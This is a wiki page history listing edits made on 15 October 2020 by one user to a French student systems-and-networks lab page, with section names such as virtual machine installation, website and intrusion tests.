Tmertz : /* Tests d’intrusion */

TP sysres IMA5sc 2020/2021 G3

2020-10-15T09:55:12Z

Tmertz : /* Installation VirtualMachine */

TP sysres IMA5sc 2020/2021 G3

2020-10-15T09:54:27Z

Tmertz : /* Installation VirtualMachine */

TP sysres IMA5sc 2020/2021 G3

2020-10-15T09:49:28Z

Tmertz : /* Site Web */

TP sysres IMA5sc 2020/2021 G3

2020-10-15T09:48:39Z

Tmertz : /* Site Web */

TP sysres IMA5sc 2020/2021 G3

2020-10-15T09:46:40Z

Tmertz : /* Installation VirtualMachine */

TP sysres IMA5sc 2020/2021 G3

2020-10-15T09:43:54Z

Tmertz : /* Installation VirtualMachine */